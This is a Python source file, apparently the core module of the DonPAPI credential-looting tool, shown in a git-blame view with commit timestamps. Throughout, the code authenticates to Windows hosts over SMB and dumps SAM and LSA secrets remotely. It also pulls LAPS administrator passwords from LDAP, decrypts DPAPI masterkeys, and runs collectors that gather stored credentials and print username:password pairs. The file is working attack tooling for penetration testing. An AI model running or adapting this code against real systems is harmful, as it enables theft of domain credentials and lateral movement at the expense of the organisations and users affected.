2024-07-05 13:47:43 +00:00
|
|
|
import argparse
|
|
|
|
import json
|
|
|
|
import ntpath
|
|
|
|
import os
|
|
|
|
from typing import Dict, List
|
|
|
|
from impacket.dcerpc.v5 import rrp
|
|
|
|
from donpapi.lib.config import DEFAULT_CUSTOM_SHARE, DonPAPIConfig
|
|
|
|
from donpapi.lib.database import Database
|
|
|
|
from donpapi.lib.secretsdump import DonPAPIRemoteOperations, LSADump, SAMDump
|
|
|
|
from dploot.lib.target import Target
|
|
|
|
from dploot.lib.smb import DPLootSMBConnection
|
|
|
|
from dploot.triage.masterkeys import MasterkeysTriage, Masterkey
|
|
|
|
|
|
|
|
from donpapi.lib.logger import DonPAPIAdapter
|
|
|
|
from donpapi.lib.paths import DPP_LOOT_DIR_NAME
|
|
|
|
|
|
|
|
|
|
|
|
class DonPAPICore:
|
2024-10-21 09:53:16 +00:00
|
|
|
def __init__(self, options: argparse.Namespace, db: Database, target: str, collectors: List, pvkbytes: bytes, plaintexts: Dict[str,str], nthashes: Dict[str,str], masterkeys: List[Masterkey], donpapi_config: DonPAPIConfig, false_positive: list, max_filesize: int, output_dir:str) -> None:
|
2024-07-05 13:47:43 +00:00
|
|
|
self.options = options
|
|
|
|
self.db = db
|
|
|
|
self.host = target
|
|
|
|
self.collectors = collectors
|
|
|
|
self.pvkbytes = pvkbytes
|
|
|
|
self.plaintexts = plaintexts
|
|
|
|
self.nthashes = nthashes
|
|
|
|
self.masterkeys = masterkeys
|
|
|
|
self.donpapi_config = donpapi_config
|
|
|
|
|
|
|
|
self.share = DEFAULT_CUSTOM_SHARE
|
|
|
|
self.remoteops_allowed = not options.no_remoteops
|
|
|
|
|
2024-10-21 09:53:16 +00:00
|
|
|
self.global_output_dir = os.path.join(output_dir, DPP_LOOT_DIR_NAME)
|
|
|
|
self.target_output_dir = os.path.join(output_dir, DPP_LOOT_DIR_NAME, self.host)
|
|
|
|
os.makedirs(self.target_output_dir, exist_ok=True)
|
|
|
|
|
|
|
|
self.false_positive = false_positive
|
|
|
|
self.max_filesize = max_filesize
|
2024-07-05 13:47:43 +00:00
|
|
|
|
|
|
|
self.dploot_conn = None
|
|
|
|
self.dpp_remoteops = None
|
|
|
|
self.bootkey = None
|
|
|
|
self._users = None
|
|
|
|
self._is_admin = None
|
|
|
|
self.sam_dump = None
|
|
|
|
self.lsa_dump = None
|
|
|
|
self.dpapi_systemkey = None
|
|
|
|
self.hostname = None
|
|
|
|
self.dploot_target = Target.create(
|
|
|
|
domain=options.domain,
|
2024-07-11 12:38:28 +00:00
|
|
|
username=options.username if options.username is not None else "",
|
|
|
|
password=options.password if options.password is not None else "",
|
2024-07-05 13:47:43 +00:00
|
|
|
target=self.host,
|
2024-07-11 12:38:28 +00:00
|
|
|
lmhash=options.lmhash if options.lmhash is not None else "",
|
|
|
|
nthash=options.nthash if options.nthash is not None else "",
|
|
|
|
do_kerberos=options.k or options.aesKey,
|
|
|
|
no_pass=True,
|
2024-07-05 13:47:43 +00:00
|
|
|
aesKey=options.aesKey,
|
2024-07-11 12:38:28 +00:00
|
|
|
use_kcache=options.k,
|
2024-07-05 13:47:43 +00:00
|
|
|
)
|
|
|
|
self.logger = DonPAPIAdapter()
|
|
|
|
if not self.init_connection():
|
|
|
|
return
|
|
|
|
if self.options.laps:
|
|
|
|
hostname = self.dploot_conn.smb_session.getServerName()
|
|
|
|
password = self.get_laps_pass(hostname)
|
|
|
|
if len(password)>=1:
|
|
|
|
password = password[0][2]
|
|
|
|
if password is not None:
|
|
|
|
self.dploot_target = Target.create(
|
|
|
|
domain='.',
|
|
|
|
username=self.options.laps,
|
|
|
|
password=password,
|
|
|
|
target=self.host,
|
|
|
|
lmhash="",
|
|
|
|
nthash="",
|
|
|
|
do_kerberos=False,
|
|
|
|
no_pass=False,
|
|
|
|
aesKey=None,
|
|
|
|
use_kcache=False,
|
|
|
|
)
|
|
|
|
|
|
|
|
if not self.init_connection():
|
|
|
|
return
|
|
|
|
else:
|
|
|
|
self.logger.debug(f"Could not find LAPS entry for {hostname}")
|
|
|
|
|
|
|
|
self.host = self.dploot_conn.smb_session.getRemoteHost()
|
|
|
|
self.hostname = self.dploot_conn.smb_session.getServerName()
|
|
|
|
self.db.add_computer(
|
|
|
|
ip=self.host,
|
|
|
|
hostname=self.hostname,
|
|
|
|
domain=self.dploot_conn.smb_session.getServerDNSDomainName(),
|
|
|
|
dc="SYSVOL" in [s["shi1_netname"].rstrip("\x00") for s in self.dploot_conn.smb_session.listShares()] # dirty
|
|
|
|
)
|
|
|
|
|
|
|
|
self.setup_logger()
|
|
|
|
self.logger.debug(self.dploot_target)
|
|
|
|
if self.is_admin:
|
|
|
|
self.run()
|
|
|
|
|
|
|
|
def setup_logger(self):
|
|
|
|
self.logger.extra={
|
|
|
|
"host": self.host,
|
|
|
|
"hostname": self.hostname,
|
|
|
|
}
|
|
|
|
|
|
|
|
def init_connection(self):
|
|
|
|
self.dploot_conn = DPLootSMBConnection(self.dploot_target)
|
|
|
|
if self.dploot_conn.connect() is None:
|
|
|
|
self.logger.debug("Could not connect to %s" % self.dploot_target.address)
|
|
|
|
return False
|
|
|
|
return True
|
|
|
|
|
|
|
|
def enable_remoteops(self):
|
|
|
|
if self.dploot_conn is not None and self.remoteops_allowed:
|
|
|
|
try:
|
|
|
|
if self.dpp_remoteops is None:
|
|
|
|
self.dpp_remoteops = DonPAPIRemoteOperations(
|
|
|
|
smb_connection=self.dploot_conn.smb_session,
|
|
|
|
logger=self.logger,
|
|
|
|
share_name=self.donpapi_config.custom_share,
|
|
|
|
file_extension=self.donpapi_config.custom_file_extension,
|
|
|
|
filename_regex=self.donpapi_config.custom_filename_regex,
|
|
|
|
remote_filepath=self.donpapi_config.custom_remote_filepath,
|
|
|
|
)
|
|
|
|
self.dpp_remoteops.enableRegistry()
|
|
|
|
if self.bootkey is None:
|
|
|
|
self.bootkey = self.dpp_remoteops.getBootKey()
|
|
|
|
except Exception as e:
|
|
|
|
self.logger.error(f"Error while enabling remoteops: {e}")
|
|
|
|
import traceback
|
|
|
|
traceback.print_exc()
|
|
|
|
|
|
|
|
def reg_query_value(self,path,key):
|
|
|
|
ans = None
|
|
|
|
if self.dpp_remoteops is None:
|
|
|
|
self.enable_remoteops()
|
|
|
|
if path[:4] == "HKCU":
|
|
|
|
path = path[5:]
|
|
|
|
ans = rrp.hOpenCurrentUser(self.dpp_remoteops._DonPAPIRemoteOperations__rrp)
|
|
|
|
else:
|
|
|
|
if path[:4] == "HKLM":
|
|
|
|
path = path[5:]
|
|
|
|
ans = rrp.hOpenLocalMachine(self.dpp_remoteops._DonPAPIRemoteOperations__rrp)
|
|
|
|
reg_handle = ans["phKey"]
|
|
|
|
ans = rrp.hBaseRegOpenKey(
|
|
|
|
self.dpp_remoteops._DonPAPIRemoteOperations__rrp,
|
|
|
|
reg_handle,
|
|
|
|
path,
|
|
|
|
)
|
|
|
|
key_handle = ans["phkResult"]
|
|
|
|
value = rrp.hBaseRegQueryValue(self.dpp_remoteops._DonPAPIRemoteOperations__rrp, key_handle, key)
|
|
|
|
return value
|
|
|
|
|
|
|
|
def dump_sam(self) -> Dict[str,str]:
|
|
|
|
if self.sam_dump is not None:
|
|
|
|
return self.sam_dump
|
|
|
|
self.enable_remoteops()
|
|
|
|
samdump = SAMDump(remote_ops=self.dpp_remoteops, bootkey=self.bootkey)
|
|
|
|
try:
|
|
|
|
samdump.dump()
|
|
|
|
samdump.save_to_db(self.db, self.host)
|
|
|
|
self.sam_dump = samdump
|
|
|
|
except:
|
|
|
|
self.logger.fail("Could not dump SAM.")
|
|
|
|
return self.sam_dump
|
|
|
|
|
|
|
|
def dump_lsa(self) -> Dict[str,str]:
|
|
|
|
if self.lsa_dump is not None:
|
|
|
|
return self.lsa_dump
|
|
|
|
self.enable_remoteops()
|
|
|
|
lsadump = LSADump(remote_ops=self.dpp_remoteops, bootkey=self.bootkey)
|
|
|
|
try:
|
|
|
|
lsadump.dump()
|
|
|
|
lsadump.save_secrets_to_db(self.db, self.host)
|
|
|
|
self.lsa_dump = lsadump
|
|
|
|
except:
|
|
|
|
self.logger.fail("Could not dump LSA")
|
|
|
|
return self.lsa_dump
|
|
|
|
|
|
|
|
def get_laps_pass(self, hostname):
|
|
|
|
from impacket.ldap import ldap, ldapasn1
|
|
|
|
results = None
|
|
|
|
try:
|
|
|
|
base_dn = 'dc='
|
|
|
|
base_dn += ",dc=".join(self.dploot_target.domain.split('.'))
|
|
|
|
ldap_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(sAMAccountName=" + hostname + "$))"
|
|
|
|
attributes = [
|
|
|
|
"msLAPS-EncryptedPassword",
|
|
|
|
"msLAPS-Password",
|
|
|
|
"ms-MCS-AdmPwd",
|
|
|
|
"sAMAccountName",
|
|
|
|
]
|
|
|
|
ldap_url = f"ldap://{self.dploot_target.domain}"
|
|
|
|
ldap_connection = ldap.LDAPConnection(ldap_url, base_dn)
|
|
|
|
if self.dploot_target.use_kcache:
|
|
|
|
# Kerberos connection
|
|
|
|
ldap_connection.kerberosLogin(
|
|
|
|
self.dploot_target.username,
|
|
|
|
self.dploot_target.password,
|
|
|
|
self.dploot_target.domain,
|
|
|
|
self.dploot_target.lmhash,
|
|
|
|
self.dploot_target.nthash,
|
|
|
|
self.dploot_target.aesKey,
|
|
|
|
useCache=self.dploot_target.use_kcache,
|
|
|
|
)
|
|
|
|
else:
|
|
|
|
# NTLM connection
|
|
|
|
ldap_connection.login(
|
|
|
|
self.dploot_target.username,
|
|
|
|
self.dploot_target.password,
|
|
|
|
self.dploot_target.domain,
|
|
|
|
self.dploot_target.lmhash,
|
|
|
|
self.dploot_target.nthash,
|
|
|
|
)
|
|
|
|
results = ldap_connection.search(
|
|
|
|
searchFilter=ldap_filter,
|
|
|
|
attributes=attributes,
|
|
|
|
sizeLimit=0,
|
|
|
|
)
|
|
|
|
except Exception as e:
|
|
|
|
self.logger.error(f"Exception while requesting LAPS passwords: {e}")
|
|
|
|
import traceback
|
|
|
|
traceback.print_exc()
|
|
|
|
|
|
|
|
# Great code from NXC
|
|
|
|
results = [r for r in results if isinstance(r, ldapasn1.SearchResultEntry)]
|
|
|
|
laps_computers = []
|
|
|
|
if len(results) != 0:
|
|
|
|
for computer in results:
|
|
|
|
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in computer["attributes"]}
|
|
|
|
if "mslaps-encryptedpassword" in values:
|
|
|
|
self.logger.debug("LAPSv2 hashes detected, not supported yet.")
|
|
|
|
elif "mslaps-password" in values:
|
|
|
|
r = json.loads(str(values["mslaps-password"]))
|
|
|
|
laps_computers.append((str(values["samaccountname"]), r["n"], str(r["p"])))
|
|
|
|
elif "ms-mcs-admpwd" in values:
|
|
|
|
laps_computers.append((str(values["samaccountname"]), "", str(values["ms-mcs-admpwd"])))
|
|
|
|
else:
|
|
|
|
self.logger.debug("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password")
|
|
|
|
else:
|
|
|
|
self.logger.fail("Could not retrieve LAPS passwords from LDAP")
|
|
|
|
laps_pass = sorted(laps_computers, key=lambda x: x[0])
|
|
|
|
return laps_pass
|
|
|
|
|
|
|
|
def get_masterkeys(self):
|
|
|
|
masterkeys = []
|
|
|
|
try:
|
|
|
|
masterkeys_triage = MasterkeysTriage(
|
|
|
|
target=self.dploot_target,
|
|
|
|
conn=self.dploot_conn,
|
|
|
|
pvkbytes=self.pvkbytes,
|
|
|
|
passwords=self.plaintexts,
|
|
|
|
nthashes=self.nthashes,
|
|
|
|
dpapiSystem=self.dpapi_systemkey,
|
|
|
|
)
|
|
|
|
masterkeys += masterkeys_triage.triage_masterkeys()
|
|
|
|
if self.remoteops_allowed and self.lsa_dump is not None:
|
|
|
|
masterkeys += masterkeys_triage.triage_system_masterkeys()
|
|
|
|
except Exception as e:
|
|
|
|
self.logger.debug(f"Could not get masterkeys: {e}")
|
2024-07-11 12:38:28 +00:00
|
|
|
self.masterkeys += masterkeys
|
2024-07-05 13:47:43 +00:00
|
|
|
|
|
|
|
def run(self):
|
|
|
|
self.logger.display("Starting gathering credz")
|
|
|
|
if self.remoteops_allowed:
|
|
|
|
# Dump SAM
|
|
|
|
self.logger.display("Dumping SAM")
|
|
|
|
self.dump_sam()
|
2024-10-21 08:32:57 +00:00
|
|
|
if hasattr(self.sam_dump, "items_found") and self.sam_dump.items_found is not None:
|
2024-07-05 13:47:43 +00:00
|
|
|
self.logger.secret(f"Got {len(self.sam_dump.items_found)} accounts", "SAM")
|
|
|
|
else:
|
|
|
|
self.logger.fail(f"No account found in SAM (maybe blocked by EDR)")
|
|
|
|
|
|
|
|
# Dump LSA
|
|
|
|
self.logger.display("Dumping LSA")
|
|
|
|
self.dump_lsa()
|
|
|
|
if self.lsa_dump is not None:
|
|
|
|
if self.lsa_dump.secrets:
|
|
|
|
for secret in self.lsa_dump.secrets:
|
|
|
|
if secret.count(':')==1:
|
|
|
|
username, password = secret.split(':')
|
|
|
|
if username not in ["dpapi_machinekey", "dpapi_userkey", "NL$KM", "ASP.NETAutoGenKeys"]:
|
|
|
|
if username not in self.plaintexts:
|
|
|
|
self.plaintexts[username] = [password]
|
|
|
|
self.logger.secret(f"{username}:{password}","LSA")
|
|
|
|
|
|
|
|
self.logger.verbose(f"Got {len(self.lsa_dump.secrets)} LSA secrets")
|
|
|
|
# Getting DPAPI Machine keys
|
|
|
|
self.dpapi_systemkey = self.lsa_dump.get_dpapiSystem_keys()
|
|
|
|
else :
|
|
|
|
self.logger.fail(f"No secret found in LSA (maybe blocked by EDR)")
|
|
|
|
|
|
|
|
# Get Masterkeys
|
|
|
|
self.logger.display(f"Dumping User{' and Machine ' if self.remoteops_allowed else ' '}masterkeys")
|
|
|
|
self.get_masterkeys()
|
|
|
|
if len(self.masterkeys) == 0 or self.masterkeys is None:
|
|
|
|
self.logger.fail("No masterkeys looted")
|
|
|
|
else:
|
|
|
|
self.logger.secret(f"Got {len(self.masterkeys)} masterkeys", "DPAPI")
|
|
|
|
|
|
|
|
for collector in self.collectors:
|
|
|
|
try:
|
2024-10-21 09:53:16 +00:00
|
|
|
collector(
|
|
|
|
self.dploot_target,
|
|
|
|
self.dploot_conn,
|
|
|
|
self.masterkeys,
|
|
|
|
self.options,
|
|
|
|
self.logger,
|
|
|
|
self,
|
|
|
|
self.false_positive,
|
|
|
|
self.max_filesize
|
|
|
|
).run()
|
2024-07-05 13:47:43 +00:00
|
|
|
except Exception as e:
|
|
|
|
self.logger.fail(f"Error during {collector.__name__}: {e}")
|
|
|
|
|
|
|
|
# Get yadayadayada
|
2024-07-11 12:38:28 +00:00
|
|
|
self.logger.verbose("Finished thread")
|
2024-07-05 13:47:43 +00:00
|
|
|
|
|
|
|
@property
|
|
|
|
def is_admin(self) -> bool:
|
|
|
|
if self._is_admin is not None:
|
|
|
|
return self._is_admin
|
|
|
|
self._is_admin = self.dploot_conn.is_admin()
|
|
|
|
return self._is_admin
|
|
|
|
|
|
|
|
@property
|
|
|
|
def users(self) -> List[str]:
|
|
|
|
if self._users is not None:
|
|
|
|
return self._users
|
|
|
|
|
|
|
|
users = list()
|
|
|
|
false_positive = ['.','..', 'desktop.ini','Public','Default','Default User','All Users']
|
|
|
|
users_dir_path = 'Users\\*'
|
|
|
|
directories = self.dploot_conn.listPath(shareName=self.share, path=ntpath.normpath(users_dir_path))
|
|
|
|
for d in directories:
|
|
|
|
if d.get_longname() not in false_positive and d.is_directory() > 0:
|
|
|
|
users.append(d.get_longname())
|
|
|
|
|
|
|
|
self._users = users
|
|
|
|
|
|
|
|
return self._users
|